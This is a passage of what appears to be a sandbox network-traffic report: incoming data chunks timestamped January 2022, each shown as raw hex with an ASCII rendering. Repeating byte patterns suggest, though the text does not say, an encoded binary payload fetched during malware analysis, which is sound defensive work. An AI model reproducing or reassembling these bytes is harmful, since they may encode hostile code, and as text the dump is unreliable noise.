c1 ad e8 bd 1b f6 e9 cd 9e 53 67 25 89 32 19 3b 24 37 a9 be d7 7c 20 d1 b7 63 db 8f 3d b5 76 50 46 91 e5 28 02 d4 81 3a
                          Data Ascii: |*H=z|M&}kR\9tpl?y$UX#!*w,{#cTNu?]fs<y}QZ/XBK^vL-Oyl2oF+>oE$RhJ4Fj.%f?cpN)s6%U/t.Ah<@=S5\6Sg%2;$7| c=vPF(:
                          2022-01-13 19:22:56 UTC1172INData Raw: 8f e9 dd d0 2a 71 ab 60 e7 f2 45 9e ba 54 6e cc 0a f5 55 ca b6 3f f3 20 ad 52 2e 29 fd b1 3d 39 b1 88 d8 7d 5d 44 ec cb 81 35 b6 23 3f 99 d8 81 59 cb d8 32 5f 48 57 3c da 4c fb 4b cd 4d d0 3e 43 53 f1 ca 8c 5a f1 44 8f f9 39 b5 4f ce 37 c6 08 d2 e5 e3 c6 da 1a 29 fc b0 cf 2f 5b 69 3c d0 e5 87 54 ef f1 71 08 cd 7e 1e 03 4e 9d 40 e2 95 8f 15 66 32 00 66 0a f3 69 0e f7 91 09 d7 7b 92 1f 23 b9 f6 23 6e bb 54 e5 d1 3b e6 cd df 09 85 33 3e 9d 44 35 42 3e 5a 99 86 9d 6b 79 fe 99 51 0a 70 6e 2d a7 9e c1 da 35 62 35 e2 d3 23 9c d8 6c 9e 1a 48 f4 f9 bf 49 32 f4 fb c9 b5 0c 9c b7 79 73 d3 f5 58 9e 0a 49 0d 8b be 1e 76 b2 d6 17 e2 91 b8 9e 45 2a 5c cb 9d 81 fa ff 77 6e 2e 12 0a 79 d0 05 a9 a9 48 30 23 08 42 41 96 78 fa 4a 20 82 e4 f3 52 3e 54 8d 2b ba 82 52 42 1c f0
                          Data Ascii: *q`ETnU? R.)=9}]D5#?Y2_HW<LKM>CSZD9O7)/[i<Tq~N@f2fi{##nT;3>D5B>ZkyQpn-5b5#lHI2ysXIvE*\wn.yH0#BAxJ R>T+RB
                          2022-01-13 19:22:56 UTC1175INData Raw: c5 9c 13 46 5e 75 15 e1 7c 16 dd c4 84 02 c9 6a 06 96 09 36 14 cc 89 e3 e5 89 98 99 b6 df 41 6b 05 32 5a 69 94 be d4 e2 80 31 f3 c2 d4 d0 0e 9e 23 74 61 78 27 ab 27 9e 0f c3 3d f9 2f 6b 36 45 9a 0e 21 b2 ea 02 93 d3 7a 7d b4 86 b7 ca 4d 04 8c ca 67 44 26 fe 72 07 d5 54 15 24 7e fc ef 24 56 ad 9d 35 7d 72 8b 08 f9 db 62 59 fe 9f e2 e4 de 2e 49 02 ad 97 14 50 96 3a 84 a7 1a 3b 59 70 8f 4b 26 ca 6b 37 fc da 14 74 e9 b2 65 6d 15 de 37 28 8a b1 f7 41 89 b8 18 70 d9 ce a1 3d 5f a8 a8 d7 bc e0 05 5b 12 99 9b ea 95 03 69 be d4 e6 6b 9f 28 eb 48 9c 70 cc 01 0f 13 df d2 05 e0 91 2a e8 66 6d a4 25 f7 05 dc 09 f3 2a d1 f6 a6 79 6f 16 2a c4 71 78 25 35 39 29 06 99 88 5e 62 20 a8 38 af 7c a3 65 e0 c5 b1 94 56 85 9c d9 e3 9e 5b 8e 17 42 5d 93 90 0d d1 8f 26 5f 78 a8 46
                          Data Ascii: F^u|j6Ak2Zi1#tax''=/k6E!z}MgD&rT$~$V5}rbY.IP:;YpK&k7tem7(Ap=_[ik(Hp*fm%*yo*qx%59)^b 8|eV[B]&_xF
                          2022-01-13 19:22:56 UTC1179INData Raw: c8 a4 40 72 05 3b 98 0d 35 44 b7 9a 4f 52 11 26 26 3e 3c 4f b2 96 5f 9a 26 ba 29 a7 f1 d7 cb c6 1b 9c 00 af 1c 19 86 24 17 a9 b3 bf 51 43 33 8f b8 5a cc 84 bc fd 7c f4 8c 8a 22 b2 85 13 81 0f 82 dd 1c bd 9a 86 b4 42 51 66 e5 0b 11 68 7e f2 a2 d4 91 2d 3a 23 38 06 f3 33 21 d3 ec a0 ce a8 ea ab a7 84 0a d6 79 47 08 3c 6c 17 ed 9e 5e d5 b4 1c 11 92 27 23 3e b0 1a 77 9f ce 5b db ed c1 7b 84 b3 6b 03 33 ac 46 d7 26 75 0c 65 af c8 f6 b9 73 89 e3 09 1d 64 b3 16 83 53 4c 8c 5a bc a0 76 98 a4 5d 97 af 39 57 f1 a5 df 96 17 c2 e2 f4 23 4a ad 98 71 16 da 32 d3 d2 0c 49 8d ed 1f 30 96 0a 52 43 16 bf 8b 63 27 78 57 af 2b af e0 f2 50 f7 be 83 df db dc 0d ce a1 73 22 11 ad 1c 72 3e 32 d4 fa 2a a6 50 56 2e e1 14 76 18 b6 83 4f 8b 74 36 35 8f ed 0e 6e 74 b4 2f 6b b2 2d e0
                          Data Ascii: @r;5DOR&&><O_&)$QC3Z|"BQfh~-:#83!yG<l^'#>w[{k3F&uesdSLZv]9W#Jq2I0RCc'xW+Ps"r>2*PV.vOt65nt/k-
                          2022-01-13 19:22:56 UTC1183INData Raw: 6d ac 05 08 2d 70 7a 2b f3 56 d6 c6 68 c0 6b 69 1f 0e a7 83 b7 08 cd 93 1a 9c d5 f1 72 0a 28 ea 9d 87 83 b9 46 8a 77 b8 1e 4b a8 01 f6 0f 2c 95 b2 99 d5 27 49 ae db 98 58 c6 d9 24 97 06 36 1d 5f 95 a8 dc 69 de 87 77 23 d6 ba 27 46 c3 7c e1 04 d9 75 9e c2 0f 3c c3 e2 92 4c 80 59 4c 91 2c f9 23 81 cd e0 da d0 c4 4a 86 d8 14 85 32 00 f0 0b 0e 2f 53 b8 3a 11 7b 03 d3 8c 08 e7 0d bd 65 a4 4f 2b bc 27 ee 4d 9e b4 6a 32 c2 0a f8 14 ce 95 8c ad 62 cd d2 27 41 fa fa 3a b9 33 67 f8 16 da ae ae 2f 5f de f1 8f f5 eb 4b 71 19 df 80 10 4c 9a f9 6d 54 3a 5a 43 ea 8a b2 8c 90 03 32 83 f1 6f 1f 94 90 43 d0 2d 03 5c 9b 5c 30 ac 53 8b 1e 7c ad db d9 5d be 7e 71 b1 04 ea 0c f8 df 9d 95 46 c6 eb 1d b5 1d da a6 12 41 e6 e9 64 b3 87 cf 95 07 1b 0b 0b da ff 54 55 7b e0 91 13 16
                          Data Ascii: m-pz+Vhkir(FwK,'IX$6_iw#'F|u<LYL,#J2/S:{eO+'Mj2b'A:3g/_KqLmT:ZC2oC-\\0S|]~qFAdTU{
                          2022-01-13 19:22:56 UTC1187INData Raw: 27 b2 ed d3 3d 3e 8b e7 e1 8c 0a fd 79 48 8b 64 e5 f6 4f 6a 2e 0c e9 7b 7e ab fd 8f ff e2 7b c3 bd 59 5e 87 cc 85 1d 81 e6 44 a7 26 38 d3 71 2e a1 b7 c7 56 92 03 5a 53 2a 61 7d 8d bd 62 e6 0f 73 81 a8 cc d8 ca 7d c7 00 72 90 c9 2d 95 54 4e 59 7f 36 a6 98 bf 18 00 69 90 91 bf ac 24 db f1 e2 47 a2 37 e9 01 9f 06 ae ce 23 32 72 a9 82 00 c3 cd 9e 08 60 fa 0f 79 64 2d 44 65 bc 1a b2 f0 41 e5 1b 26 4d 06 46 40 a5 e0 90 10 31 49 f3 24 44 bb 77 c5 3e 3c 66 13 78 56 2d 9a af ed 89 f5 ad cd 5a c9 7d eb d2 72 25 fa ca ae 2f 59 e4 f3 ec 6c 9b eb fe 45 d2 d9 39 71 e1 5e 1c 6e c1 e0 1d 13 a6 bb b6 b5 6d 17 ed e5 28 03 6f 41 b8 28 9f 1b 6b 9c fb 64 40 1c b2 84 4b 78 50 76 bb 56 08 ac 0d 19 6e de 92 ee 0b 20 4b f6 90 ed 68 87 9b d1 ff 38 69 aa 6c cf 72 dc 10 66 c9 0d b2
                          Data Ascii: '=>yHdOj.{~{Y^D&8q.VZS*a}bs}r-TNY6i$G7#2r`yd-DeA&MF@1I$Dw><fxV-Z}r%/YlE9q^nm(oA(kd@KxPvVn Kh8ilrf
                          2022-01-13 19:22:56 UTC1192INData Raw: 4f 19 c7 30 e5 6e e1 af 18 51 7d ba 90 89 41 0a 96 c0 8e 58 c5 01 a2 db 9f c1 8d a2 d6 d7 ca 72 62 c8 df 55 4c 6b 1a 5e d8 93 a1 47 8c 8e fe 2e 16 69 13 e2 45 8f a7 0f 68 a6 da a7 57 9a 6b 74 ca dd c7 23 e3 60 80 16 f1 05 d8 dc b1 af 26 be 55 33 97 2d d2 00 23 d3 51 18 2d 00 83 33 7b 62 60 e0 b6 1a 43 9b 4d 9d b1 be fd cb 5a 2f b0 6c 83 2e 1c 66 e0 03 07 5d 31 03 96 d5 26 a9 b3 89 21 2b fc b7 04 d1 a1 c0 2e 07 10 c5 9d a5 a1 df 6e 04 99 e8 7f 13 34 ff 91 0c d9 7f bf 77 19 9b 14 30 69 d0 0f 29 ee 83 a6 89 89 63 06 e2 a8 93 87 7b 4a 7c c8 1b 95 35 44 04 c3 90 9a 80 1d bd d9 a9 e9 06 e9 3e e3 ef d9 9d 57 b0 65 b0 0a d0 af 32 08 42 0c 41 90 c3 e9 12 4b 4b 08 f0 be df 63 8e bd e5 df 28 1a 8b 9d 57 5a 52 9f 26 cc 99 28 42 a8 78 b6 30 5d 12 dc f1 69 05 e6 c9 8a
                          Data Ascii: O0nQ}AXrbULk^G.iEhWkt#`&U3-#Q-3{b`CMZ/l.f]1&!+.n4w0i)c{J|5D>We2BAKKc(WZR&(Bx0]i
                          2022-01-13 19:22:56 UTC1196INData Raw: bc 6a b6 18 47 62 97 c6 40 ec 16 9c 95 a8 85 d5 90 85 d9 2d 7f a0 e3 52 0b 1c c3 c4 0c b8 52 32 03 28 ff 61 0b 8f fa dd 7b 97 c7 96 4d 9d c8 94 ac 96 7d a3 a3 a9 5d 6f d8 79 b9 1b b7 0f 89 5a 0e a4 12 83 29 d2 90 c1 1e 05 4e da 5d 8c aa 02 e8 85 15 48 52 68 b1 ee 8b 1b 66 96 05 fd 98 27 7b 21 f5 f2 1b e1 20 74 2c 86 fc 2d 45 fb 7c 69 b2 02 23 3b 59 49 3c 28 4d b7 c0 91 f9 5e 7b bf 3c 9e 5b df ef 99 ee 80 66 95 1a 25 1f 24 ec b0 84 c5 74 64 4c 1c 98 fe 17 7f 72 c5 b3 7d 8d d2 f9 d4 89 3e 74 13 c2 31 28 df 8b 60 d5 9d e9 23 ef 98 f8 c5 8a 9b 9c 1b 0b 29 30 6b 8f 43 9e 68 8b e2 e1 52 83 c3 f9 7d c5 6a 80 07 f5 4e fe 0e d6 b8 9c 04 02 23 63 13 dc 14 c8 8f a9 98 47 8f cc cb 7e 71 4a 25 59 e0 83 d7 ad df a8 f5 35 07 33 ab 64 cf c0 0a 57 13 ca 5d 14 57 16 a7 d3
                          Data Ascii: jGb@-RR2(a{M}]oyZ)N]HRhf'{! t,-E|i#;YI<(M^{<[f%$tdLr}>t1(`#)0kChR}jN#cG~qJ%Y53dW]W
                          2022-01-13 19:22:56 UTC1200INData Raw: 8e 4f 87 2a b6 b8 32 22 9d f2 15 7a d2 48 2b f7 42 94 64 cb 1d 3e 09 5e 9b 3f fa 35 da 46 6e d6 6a cd 93 1d cb 99 e0 1c ee 43 81 8b de 1c 33 dc 1e 2d fa 69 2e a8 1b fb e9 66 f9 28 1f 5c c2 ee 6a c8 09 57 0d 40 8f 22 23 cb c5 dc 73 d2 3f 83 91 1b ec 8a 2a fd f5 d6 0b f8 75 a2 b2 30 00 67 ee b8 00 11 94 c8 f7 c0 bd 86 e3 b6 31 39 21 2f db 76 18 49 b6 35 54 1a 63 ad 97 9e d7 bb 91 fe 81 37 5c f0 8a 8c d2 ae 89 e1 64 53 ef 13 5d 91 f6 22 9c f6 e3 b9 38 8b c8 99 97 e5 ce 23 ef af 43 25 9d d5 eb f3 22 14 6e e7 f5 f4 39 c4 9d 80 8a 16 80 e9 47 69 2b 78 25 80 63 9a c2 11 fa cc 74 02 59 fe 53 c2 2e 67 ca b8 46 ee 64 5c 05 d6 6e ea d1 30 4d d9 95 5f 49 b7 5d 31 91 4f 7e b1 d9 08 6e 63 1e 7e 61 d5 11 6c 97 b2 1b 13 d2 fb 5e 92 e6 76 40 c2 f8 ee 3d 60 3f 1a 65 12 38
                          Data Ascii: O*2"zH+Bd>^?5FnjC3-i.f(\jW@"#s?*u0g19!/vI5Tc7\dS]"8#C%"n9Gi+x%ctYS.gFd\n0M_I]1O~nc~al^v@=`?e8
                          2022-01-13 19:22:56 UTC1204INData Raw: 91 29 42 fa 91 29 42 fa 91 29 42 fa 91 29 42 fa 91 29 42 fa 91 29 42 fa 91 29 42 fa 91 29 42 fa a0 1e 9b ef c8 ef c8 eb c1 57 99 fa a0 76 5c 8b 2a 71 d3 0b 31 f8 bc a0 fb b7 4c b0 dc d3 8a 01 db 59 9c 51 aa 6c 66 c1 a2 4a 3a 68 7f 7d cd d6 73 92 9a cd 9f 24 86 f8 bc 6c 66 29 73 ba 35 05 c2 41 49 d9 f9 43 4d da 7b bc 39 26 8d 1c 97 0e b6 cf 83 3a d9 e4 50 31 65 e3 ef d9 f9 13 23 2d 7a 62 70 70 51 97 07 ff 2d 4f a6 d7 f4 78 41 80 b3 80 b3 84 bc e4 51 73 d6 a6 e7 07 c7 7c 4a d3 8b cf 82 57 98 74 58 e2 6c 93 1d e8 59 11 3d d7 f4 30 e2 ec 42 56 16 30 e2 f8 bd 2a f5 9a 8d b8 cf 26 8c 0e b7 f1 cd 26 8c 1a 91 a9 6e 27 0e ff 2c bd ba 74 58 46 33 31 64 21 01 8a a9 02 5c 6b e5 b7 4d c2 25 76 5d fe aa a4 e3 9e f5 3a d8 7e 4f a3 61 8e 92 87 23 1d 18 b9 b1 50 29 5e 08
                          Data Ascii: )B)B)B)B)B)B)B)BWv\*q1LYQlfJ:h}s$lf)s5AICM{9&:P1e#-zbppQ-OxAQs|JWtXlY=0BV0*&&n',tXF31d!\kM%v]:~Oa#P)^
                          2022-01-13 19:22:56 UTC1207INData Raw: 6b eb f5 3b 84 b1 0f 34 bc 35 12 b2 c2 2e d8 7f 40 cc 16 a1 75 d2 0c bb b7 44 d3 82 ae d0 11 34 fa a8 c1 aa f9 36 ca 1e bb bf 82 be 05 ca 22 8a 98 80 7e 47 7c 42 0f 31 a5 6d 34 ed 1b 15 c1 a5 90 90 67 fa 2c ff a5 63 76 5b 00 5e 95 04 d9 fe 3f 45 21 07 6a 64 dc 79 61 88 04 46 8e 94 26 8a 1c 90 27 08 04 46 7a 40 80 b5 09 cd fb 25 25 0c 80 b6 44 cb 3d 5a 76 58 68 7b d1 82 72 50 c1 a7 c4 2e 49 bd e7 d3 b8 cd 81 37 4a 39 41 4a 28 f2 9f 7a 6d eb e7 d5 ac d7 cb 9b 34 e9 eb c2 16 a9 a1 7d 07 c6 e9 dd 22 82 68 7f ea 5f 5d 87 f0 4a d4 0c 59 ad 67 cc fb 13 12 7f 01 ea 6e 64 95 0d bc 37 c7 9f ea 51 05 cc b1 4f 01 d5 2d 74 e6 5a a5 6a d4 02 ee 48 79 cb d3 84 fa ae 9b 00 06 4a 61 81 63 fc f4 bb d8 79 ae d6 14 ab 30 ed c2 2a c5 a2 1e 94 d2 07 91 17 57 96 a1 71 1a 9c 71
                          Data Ascii: k;45.@uD46"~G|B1m4g,cv[^?E!jdyaF&'Fz@%%D=ZvXh{rP.I7J9AJ(zm4}"h_]JYgnd7QO-tZjHyJacy0*Wqq
                          2022-01-13 19:22:56 UTC1211INData Raw: fa 91 29 42 fa 91 29 42 fa 91 29 42 fa 91 29 42 fa 91 29 42 fa 91 29 42 fa 91 29 42 fa 91 29 42 fa 91 29 42 fa 91 29 42 fa 91 29 42 fa 91 29 42 fa 91 29 42 bb ea 0f 60 78 02 0d 56 26 bc 08 79 c6 2d 22 c3 f6 fb 72 16 98 dd bf e6 09 9d 25 75 98 f1 89 72 0a 37 61 be 0c ee 05 86 90 d2 50 77 a6 a3 3f 12 e6 17 7b ae e9 ec 72 64 37 00 0d 68 0d 70 0e e6 0c f0 1a f7 0b 00 68 37 11 62 02 18 f3 63 aa 92 ca 71 e2 5c 33 3c 9c b8 ab 07 90 c8 42 92 e8 1d 46 62 28 b2 93 7b f8 8d 20 cb dd b0 88 e7 a4 aa 81 77 9d 02 09 9d 22 e0 58 2a c5 9c a5 3b 1f 43 3e bd fe ff 5b c8 42 88 e7 a6 b2 94 ce 63 c3 97 36 df b1 1e df ba 46 56 52 78 36 a6 b6 89 65 86 f5 60 5d e5 e3 de 53 e7 82 e3 b0 a4 b5 37 13 66 19 66 28 b2 80 c2 70 06 14 c7 a0 ca 27 3e 9d 2f 34 f5 34 e8 1d 5d d7 a1 20 c1 93
                          Data Ascii: )B)B)B)B)B)B)B)B)B)B)B)B)B`xV&y-"r%ur7aPw?{rd7hph7bcq\3<BFb({ w"X*;C>[Bc6FVRx6e`]S7ff(p'>/44]
                          2022-01-13 19:22:56 UTC1215INData Raw: 42 fa 91 29 42 fa 91 29 42 fa 91 29 42 fa 91 29 42 fa 91 29 42 fa 91 29 42 fa 91 29 42 fa 91 29 42 fa 91 29 42 fa 91 29 42 fa 91 29 42 fa 91 29 42 fa 91 29 42 fa 91 29 42 fa 91 29 42 fa 91 29 42 fa 91 29 42 fa 91 29 42 fa 91 29 42 fa 91 29 42 fa 91 29 42 fa 91 29 42 fa 91 29 42 fa 91 29 42 fa 91 29 42 fa 91 29 42 fa 91 29 42 fa 91 29 42 fa 91 29 42 fa 91 29 42 fa 91 29 42 fa 91 29 42 fa 91 29 42 fa 91 29 42 fa 91 29 42 fa 91 29 42 fa 91 29 42 fa 91 29 42 fa 91 29 42 fa 91 29 42 fa 91 29 42 fa 91 29 42 fa 91 29 42 fa 91 29 42 fa 91 29 42 fa 91 29 42 fa 91 29 42 fa 91 29 42 fa 91 29 42 fa 91 29 42 fa 91 29 42 fa 91 29 42 fa 91 29 42 fa 91 29 42 fa 91 29 42 fa 91 29 42 fa 91 29 42 fa 91 29 42 fa 91 29 42 fa 91 29 42 fa 91 29 42 fa 91 29 42 fa 91 29 42 fa 91
                          Data Ascii: B)B)B)B)B)B)B)B)B)B)B)B)B)B)B)B)B)B)B)B)B)B)B)B)B)B)B)B)B)B)B)B)B)B)B)B)B)B)B)B)B)B)B)B)B)B)B)B)B)B)B)B)B)B)B)B)B)B)B)B)B)B)B)B
                          2022-01-13 19:22:56 UTC1219INData Raw: 3a 53 50 c5 63 19 c7 76 92 4d 4f 40 0a 9b e0 83 f5 e3 3f ad 98 5e dc ae 16 70 87 f6 77 02 80 69 2f be e2 b0 12 7e 8e 4d 6d 2a 36 2d b4 01 1d dd 2e 27 d4 d2 c6 c2 c9 42 05 34 1c 7c 85 bb 32 1b dc fd af a1 b3 9f a3 bb 79 0b ff e3 21 d9 20 46 61 3f f2 01 ea 91 d6 bd 8a 99 3a e8 69 d0 34 db cd ae e9 ec 72 64 45 80 8b 1b 23 35 71 e2 5c 33 3d 6f dd d1 27 3e f1 fd a4 c5 89 0b f2 dc 3d e7 18 b6 66 a5 aa d1 28 2b b8 b6 50 f7 f4 e8 d7 36 20 20 69 3d 90 15 c7 45 7f cf 69 33 a6 0e 66 af 94 48 ef 11 f2 73 0b e9 13 ee 85 e2 a3 aa 14 7b 07 0c 75 1f d3 47 7f f9 f0 84 73 1a 5e fd f4 7b 07 40 14 69 2f ab 9a 4b 71 00 8a 7b 07 20 79 23 57 2a 47 07 f7 f4 7b 07 f7 0b 00 68 4e 14 94 af 6b d5 bf 8f 24 48 f8 72 61 be 0c 82 9e c5 9c c1 f3 36 eb bf 37 2d 07 9a 51 f7 67 5a d2 b0 64
                          Data Ascii: :SPcvMO@?^pwi/~Mm*6-.'B4|2y! Fa?:i4rdE#5q\3=o'>=f(+P6 i=Ei3fHs{uGs^{@i/Kq{ y#W*G{hNk$Hra67-QgZd
                          2022-01-13 19:22:56 UTC1223INData Raw: 1f 2c c9 e9 6c d7 44 91 ad e3 5a b2 78 fb 99 f3 ab cb 00 99 fa 51 5b 4e aa 5e 87 71 77 7a e3 ce 30 d2 39 5b b1 70 60 d6 e1 79 40 0a bc ca cb 56 9a 02 8a 66 f2 3f 95 cd 00 db 01 15 bb 35 91 d6 e4 cd 11 fc 37 c4 a9 99 a7 fa 25 fc 00 ff 87 b4 67 5d 27 b7 f3 8c 10 0c 12 1f bc 50 93 a7 d3 fc 1f a5 dc 0d 97 a5 c6 1f 2c c9 a5 54 22 b3 74 69 d0 34 db cc 2b 47 85 0f 09 fb 13 13 12 8f 24 b7 82 78 8e a2 31 ab 9d 43 83 f5 f9 0f 09 fb 13 12 8f 24 b7 7d fc 96 b4 f6 88 95 32 d6 42 fa 91 29 42 fa 91 29 42 fa 91 29 42 fa 91 29 42 fa 91 2a c5 9c c1 9c c1 93 2d 2e b5 00 10 53 3f d3 1b dc f0 c4 a5 aa 32 04 a2 31 b1 95 d7 3b 95 cd 51 64 ba fb ec 8d dc b3 8b e4 97 c0 ee 96 17 b9 24 93 2d 4b 8e 29 61 9d 60 c3 23 80 51 64 8d ec 8d df 13 de ac 1a 65 0b ff e3 1f e0 a7 a6 69 1c 59
                          Data Ascii: ,lDZxQ[N^qwz09[p`y@Vf?57%g]'P,T"ti4+G$x1C$}2B)B)B)B)B*-.S?21;Qd$-K)a`#QdeiY
                          2022-01-13 19:22:56 UTC1227INData Raw: 51 64 ba ba ba fb ec b7 b8 00 97 fd d3 44 01 26 70 9f b7 8b ed 0b ff e3 21 ce cf 4d 6d 26 43 83 f5 f9 f0 84 73 19 e0 a7 a6 28 3f 8c 61 41 87 ec 8d df 2a 03 28 19 e0 34 b5 de ac 7c dc b0 12 16 5d 49 76 f4 48 f8 72 fd d4 c2 ea f7 c7 5f 45 19 d3 44 01 73 2a 3a 17 83 c6 e1 25 a3 9d bc f7 92 67 33 a6 4e d8 b9 7e aa 02 82 78 c1 43 95 cd ae 61 53 60 3c 7d 0b ff 64 81 f2 7f b9 39 de 1b 51 e9 9e c5 63 3c 13 12 8f 24 b7 77 ef f9 0f 49 89 17 1a 73 a0 8c f6 77 6c d4 82 78 c1 23 ca d8 ec d8 b9 7e db 69 2f af f5 98 47 7a ef 60 c3 68 d5 24 48 f8 2c 68 b1 8f 83 ad 98 47 28 6d 26 43 cf 01 15 e9 2b f8 72 9b f0 b8 00 97 fa 57 57 57 7d 29 bd 75 14 6b 2a 3a 17 e5 1c 59 52 e2 a3 ae 16 67 33 a6 28 3f 8c 61 41 87 ec 8d df 2a 3a 17 e5 1c 59 52 e2 a3 ae 16 e1 a3 f7 f4 22 e5 a5 aa
                          Data Ascii: QdD&p!Mm&Cs(?aA*(4|]IvHr_EDs*:%g3N~xCaS`<}d9Qc<$wIswlx#~i/Gz`h$H,hG(m&C+rWWW})uk*:YRg3(?aA*:YR"
                          2022-01-13 19:22:56 UTC1243INData Raw: fc 96 b4 f6 88 95 32 d6 42 fa 91 29 40 3d 6f dd d5 b6 fb 12 8f 24 b7 7d fc 96 b4 f6 88 95 32 d6 42 fa 91 29 40 4d 92 ab 66 40 f5 07 f7 0b 00 68 4e 14 94 af 6b d5 bf 8f 24 b7 7d fc 94 07 f7 0b 04 79 f4 85 0e 87 13 12 8f 24 b7 7d fc 96 b4 f6 88 95 32 d6 40 6d d9 c8 27 37 61 bf 8f 24 b7 7d fc 96 b4 f6 88 95 32 d6 42 fa 91 29 40 7d fc 96 b0 e4 61 bf 8f 24 b7 7d fc 96 b4 f6 88 95 32 d6 42 fa 91 29 40 8d 20 ae ed fd 18 9c c1 93 2d 4b 8e a2 ce 30 d2 39 66 49 89 17 1a a1 4e 7c 7a 76 69 d9 c8 22 b3 74 68 4e 14 94 af 6b d5 bf 8f 24 b7 7d fc 96 b6 a3 51 9b 3b 63 c3 96 b4 f6 88 95 32 d6 42 fa 91 29 42 fa 91 29 42 fa 93 65 c7 a0 ce 39 66 48 07 f7 0b 00 68 4e 14 94 af 6b d5 bf 8f 24 b7 7d fe a2 ce 30 d6 4b 8e a3 51 9b 3f 73 e6 65 c7 a0 ca 27 3e f1 fd 18 9d 43 7e 57 a8
                          Data Ascii: 2B)@=o$}2B)@Mf@hNk$}y$}2@m'7a$}2B)@}a$}2B)@ -K09fIN|zvi"thNk$}Q;c2B)B)Be9fHhNk$}0KQ?se'>C~W
                          2022-01-13 19:22:56 UTC1255INData Raw: fa 91 29 42 fa 90 ae e9 ec 72 65 87 13 85 ee 77 ef f9 0e c7 a0 5d 56 26 bc 08 78 31 54 b5 98 b8 ff 1c a7 19 1f bb 66 49 89 17 1b 63 c3 07 47 85 0e 87 12 cf b2 b7 0d 04 70 60 3d 2f 50 26 fc 96 b4 f6 89 57 a8 e3 ee 77 ef f9 0e c7 a0 8f 14 94 af 6b d4 7d fc 07 e7 e7 e7 e7 e6 25 3a d7 f4 84 8c 9e c4 5a 2f c0 f1 fd 18 9d 42 ba 04 e0 b8 ff 1c a6 d6 02 6c c7 20 ae e9 ec 73 a6 d7 16 f8 8d 20 ae e8 29 42 2b 87 13 12 8f 24 b7 7d fc 96 b4 f6 88 95 32 d6 42 fa 91 29 42 fa 91 29 42 fa 91 29 42 fa 91 29 42 fa 91 29 42 fa 91 29 42 fa 91 29 42 fa 91 29 42 fa 91 29 42 fa 91 29 42 fa 91 29 42 fa 91 29 42 fa 91 29 42 fa 91 29 42 fa 91 29 42 fa 91 29 42 fa 91 29 42 fa 91 29 42 fa 91 29 42 fa 91 29 42 fa 91 29 42 fa 91 29 42 fa 91 29 42 fa 91 29 42 fa 91 29 42 fa 91 29 42 fa
                          Data Ascii: )Brew]V&x1TfIcGp`=/P&Wwk}%:Z/Bl s )B+$}2B)B)B)B)B)B)B)B)B)B)B)B)B)B)B)B)B)B)B)B)B)B)B)B)B)B)B
                          2022-01-13 19:22:56 UTC1271INData Raw: 0b 00 18 fe 19 57 d8 3d e4 29 42 fa d0 0f 1c 59 65 4c 58 f8 be cb 22 ff 1c a6 95 0b 15 e9 f8 f9 f0 fe d2 39 66 49 89 a7 f8 0e cf 6b 5e 70 60 3c ec c2 ac 6e 13 32 3a 6b 9d 14 9c e5 bf 06 3d a3 9d 8f e8 a5 99 f6 4b d5 bf 8f 24 57 6c d6 0a 7e 7f 01 fa 79 d4 19 53 12 c7 5f 45 79 2a 2d 6b f1 b1 fd 50 19 1f 6e f7 1e 55 6f 56 6e a4 2c 20 df 3d 6f dd d1 16 bc 84 01 a2 ce 30 d2 b1 e3 53 d7 d0 40 f5 06 75 eb 30 69 50 e6 9a 54 ac 0d 64 61 f2 0d 4c 58 79 79 bc 06 01 ea 6e 5b b1 f0 c0 91 d6 bd 63 66 a1 6c 73 aa 6d 91 21 62 cc 63 cd da 4a 4b f5 86 90 a6 95 5f af 94 64 ce 78 8e 5d 4f 11 e5 c3 b3 38 69 98 61 35 15 16 98 b8 1f c0 90 ee 24 f7 c7 6c 9b f3 ce fc 25 d1 49 bb c6 46 27 62 ca 6f 1e f7 55 fb 4f d6 1f 6d 87 52 42 bb 86 90 a7 29 86 11 45 80 83 0b c8 07 6b 5e 70 60
                          Data Ascii: W=)BYeLX"9fIk^p`<n2:k=K$Wl~yS_Ey*-kPnUoVn, =o0S@u0iPTdaLXyyn[cflsm!bcJK_dx]O8ia5$l%IF'boUOmRB)Ek^p`
                          2022-01-13 19:22:56 UTC1287INData Raw: 8e 4a 0b 20 8a fd 9b 77 c7 84 e0 d1 fe 9a bd 8a 9a 8d 04 34 1c 68 c5 d4 05 d7 88 1c 6f ee 32 1d 66 46 d8 c3 40 7e ff 1b 23 35 94 2e cd ae 6e 56 23 b8 b3 bf 38 eb f0 7b fa 0d bf 70 9f b7 1d c0 df 5e 70 60 1c 82 e3 5d fe 4d 19 37 45 ec fb 5b 78 42 bf 8f 24 b7 7f 31 70 24 70 60 3c 6b e9 e9 61 f2 00 6f df 49 b1 54 66 8e 96 c1 53 1a 79 7f 01 ea 6e d3 9f e4 ea 26 bc 08 fb 1a b4 09 0a f5 4e ee fc c6 f2 03 a6 80 9b 1b 57 21 79 e4 45 ec fb 5b b9 a5 09 72 2c 05 3f bf 43 b0 21 f2 d8 82 04 38 1b dc b1 cb 41 58 0e c3 1e e2 5c 33 59 2d 6f 59 26 f4 ac c1 d7 4d da 4a 0b 00 e0 7c fe 11 45 b0 c9 e1 53 9f 48 07 67 e8 ed 7f 39 42 be 85 0e 87 13 8a bd 0e 0c da a6 54 6a 9e 09 37 ad ab ae 25 f6 77 10 75 8b f3 02 6c 57 28 e4 ed 79 bc f7 f4 7f 94 47 85 0e 87 93 09 77 62 09 fb 13
                          Data Ascii: J w4ho2fF@~#5.nV#8{p^p`]M7E[xB$1p$p`<kaoITfSyn&NW!yE[r,?C!8AX\3Y-oY&MJ|ESHg9BTj7%wulW(yGwb
                          2022-01-13 19:22:56 UTC1303INData Raw: b4 97 52 74 46 03 ed f4 84 8c 96 b4 f6 8a a5 60 18 fc e2 3d 0b 69 fe 9a be 0c 82 87 1b 23 35 58 ce 07 d3 da 3e 90 c2 7c 54 22 b0 ed f4 84 8a 99 3a e1 9a bd 8a 99 3a 9b 4c 72 4a 0b 03 ee 77 ef fb 13 12 8f 14 94 af 6b b4 82 e6 01 c4 1a a2 ce 30 d2 38 e4 61 a6 27 3e f1 fd 6c 2f 35 29 6c 57 ab 62 41 78 79 f4 84 88 55 92 8f 45 f4 e5 87 7a 58 2a c6 1e aa e0 50 19 1f 2c 25 0e a3 30 a6 b6 9f 21 1f 2c ca 27 3e f1 f5 06 75 e9 a8 e9 c8 42 8e c3 f3 6b fb 13 11 0d 04 70 68 4e 14 91 c1 a4 f7 6a 26 dd b5 11 23 35 5e 38 e4 61 b8 ff 1c af 2b 47 85 0e 87 60 4f f5 28 c0 12 8f 24 b7 7f 01 ea 6e 6b d5 bf 8f 45 f4 e5 87 3d 6f de 53 9f 48 06 75 